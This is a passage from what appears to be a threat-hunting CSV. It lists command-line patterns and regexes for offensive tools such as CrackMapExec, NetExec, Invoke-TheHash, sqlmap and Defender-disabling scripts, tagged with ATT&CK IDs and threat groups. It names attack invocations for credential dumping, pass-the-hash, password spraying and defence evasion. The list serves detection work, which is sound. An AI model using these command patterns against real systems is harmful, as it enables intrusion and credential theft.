Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","3573" "* tweetshell.sh*",".{0,1000}\stweetshell\.sh.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","0","N/A","N/A","7","10","3581","391","2024-09-02T19:15:22Z","2019-03-28T18:07:05Z","3575" "* --type asreproast*",".{0,1000}\s\-\-type\sasreproast.{0,1000}","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","0","#linux #windows","N/A","5","3","215","36","2024-12-10T17:00:02Z","2019-12-08T00:25:57Z","3576" "* --type enum -uf * --module o365_enum_office*",".{0,1000}\s\-\-type\senum\s\-uf\s.{0,1000}\s\-\-module\so365_enum_office.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","3577" "* --type search-spn*",".{0,1000}\s\-\-type\ssearch\-spn.{0,1000}","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","0","#linux #windows","N/A","5","3","215","36","2024-12-10T17:00:02Z","2019-12-08T00:25:57Z","3578" "* -Type SMBClient -Target * -TargetExclude * -Username * 
-Hash *",".{0,1000}\s\-Type\sSMBClient\s\-Target\s.{0,1000}\s\-TargetExclude\s.{0,1000}\s\-Username\s.{0,1000}\s\-Hash\s.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","FoxKitten","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","N/A","10","10","1569","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z","3579" "* -Type SMBEnum -Target * -TargetExclude * -Username * -Hash *",".{0,1000}\s\-Type\sSMBEnum\s\-Target\s.{0,1000}\s\-TargetExclude\s.{0,1000}\s\-Username\s.{0,1000}\s\-Hash\s.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","FoxKitten","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","N/A","10","10","1569","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z","3580" "* -Type SMBExec -Target * -TargetExclude * -Username * -Hash *",".{0,1000}\s\-Type\sSMBExec\s\-Target\s.{0,1000}\s\-TargetExclude\s.{0,1000}\s\-Username\s.{0,1000}\s\-Hash\s.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. 
Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","FoxKitten","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","N/A","10","10","1569","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z","3581" "* --type spray -uf * -pf *",".{0,1000}\s\-\-type\sspray\s\-uf\s.{0,1000}\s\-pf\s.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","3582" "* -type user -search * -DomainController * -Credential * -list yes*",".{0,1000}\s\-type\suser\s\-search\s.{0,1000}\s\-DomainController\s.{0,1000}\s\-Credential\s.{0,1000}\s\-list\syes.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Get-SPN.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","3583" "* -Type WMIExec *",".{0,1000}\s\-Type\sWMIExec\s.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. 
Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","FoxKitten","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","N/A","10","10","1569","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z","3584" "* -Type WMIExec -Target * -TargetExclude * -Username * -Hash *",".{0,1000}\s\-Type\sWMIExec\s\-Target\s.{0,1000}\s\-TargetExclude\s.{0,1000}\s\-Username\s.{0,1000}\s\-Hash\s.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","FoxKitten","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","N/A","10","10","1569","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z","3585" "* -u * -d * --dc-ip * -k --no-pass --target * --action ""list""*",".{0,1000}\s\-u\s.{0,1000}\s\-d\s.{0,1000}\s\-\-dc\-ip\s.{0,1000}\s\-k\s\-\-no\-pass\s\-\-target\s.{0,1000}\s\-\-action\s\""list\"".{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","N/A","10","8","712","89","2025-04-21T16:53:22Z","2021-07-21T19:20:00Z","3586" "* -u * --local-auth*",".{0,1000}\s\-u\s.{0,1000}\s\-\-local\-auth.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3587" "* -u * -p * --lusers*",".{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-lusers.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3588" "* -u * -p * -M handlekatz*",".{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\shandlekatz.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3589" "* -u * -p * -M nanodump*",".{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\snanodump.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3590" "* -u * -p * -M ntdsutil*",".{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\sntdsutil.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3591" "* -u * -p * --sam",".{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-sam","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3592" "* -u * -p * --shares*",".{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-shares.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3593" "* -u * -p *--pass-pol*",".{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\-\-pass\-pol.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3594" "* -u *http* --dbs",".{0,1000}\s\-u\s.{0,1000}http.{0,1000}\s\-\-dbs","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","3595" "* -u *http* --os-shell*",".{0,1000}\s\-u\s.{0,1000}http.{0,1000}\s\-\-os\-shell.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","3596" "* -u FUZZ *",".{0,1000}\s\-u\sFUZZ\s.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","3597" "* -u http* -f *.dll * -p 
*",".{0,1000}\s\-u\shttp.{0,1000}\s\-f\s.{0,1000}\.dll\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","3598" "* -u http* --wordlisturl * -e php,aspx --recursion true*",".{0,1000}\s\-u\shttp.{0,1000}\s\-\-wordlisturl\s.{0,1000}\s\-e\sphp,aspx\s\-\-recursion\strue.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","3599" "* -u jasminadmin -p* jasmin_db *",".{0,1000}\s\-u\sjasminadmin\s\-p.{0,1000}\sjasmin_db\s.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","3600" "* -U msf -P msf *",".{0,1000}\s\-U\smsf\s\-P\smsf\s.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. 
and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","3601" "* -u wordlist * wordlist_uniq_sorted*",".{0,1000}\s\-u\swordlist\s.{0,1000}\swordlist_uniq_sorted.{0,1000}","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","0","N/A","N/A","N/A","3","280","45","2025-04-22T14:34:10Z","2020-10-21T14:37:53Z","3602" "* -U:T -ShowWindowMode:Hide reg add *",".{0,1000}\s\-U\:T\s\-ShowWindowMode\:Hide\sreg\sadd\s.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","3603" "* UAC-Bypass.ps1*",".{0,1000}\sUAC\-Bypass\.ps1.{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for x64 Windows 7 - 11","T1088 - T1202 - T1112 - T1059 - T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense Evasion","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","1","0","N/A","N/A","9","9","802","156","2022-07-27T15:48:45Z","2022-07-14T02:37:50Z","3604" "* -UacMe Elevate -Execute *",".{0,1000}\s\-UacMe\sElevate\s\-Execute\s.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","3605" "* UAC-TokenMagic.ps1*",".{0,1000}\sUAC\-TokenMagic\.ps1.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","3606" "* uberfile.py *",".{0,1000}\suberfile\.py\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black 
Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","3607" "* ubiquiti-discovery.nse*",".{0,1000}\subiquiti\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3608" "* UefiShell.iso*",".{0,1000}\sUefiShell\.iso.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","3609" "* UnconstrainedDelegationCheck .ahk*",".{0,1000}\sUnconstrainedDelegationCheck\s\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","3611" "* UnconstrainedDelegationCheck.ahk*",".{0,1000}\sUnconstrainedDelegationCheck\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using 
AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","3612" "* --unconstrained-users*",".{0,1000}\s\-\-unconstrained\-users.{0,1000}","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/ropnop/windapsearch","1","0","N/A","AD Enumeration","7","9","866","154","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z","3613" "* unDefender.exe*",".{0,1000}\sunDefender\.exe.{0,1000}","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","0","N/A","N/A","10","4","358","81","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z","3614" "* -unhook -antidebug *",".{0,1000}\s\-unhook\s\-antidebug\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","3615" "* -unhook -antidebug * -self -sleep*",".{0,1000}\s\-unhook\s\-antidebug\s.{0,1000}\s\-self\s\-sleep.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","3616" "* -unhook -syscalls -obfuscate *",".{0,1000}\s\-unhook\s\-syscalls\s\-obfuscate\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider 
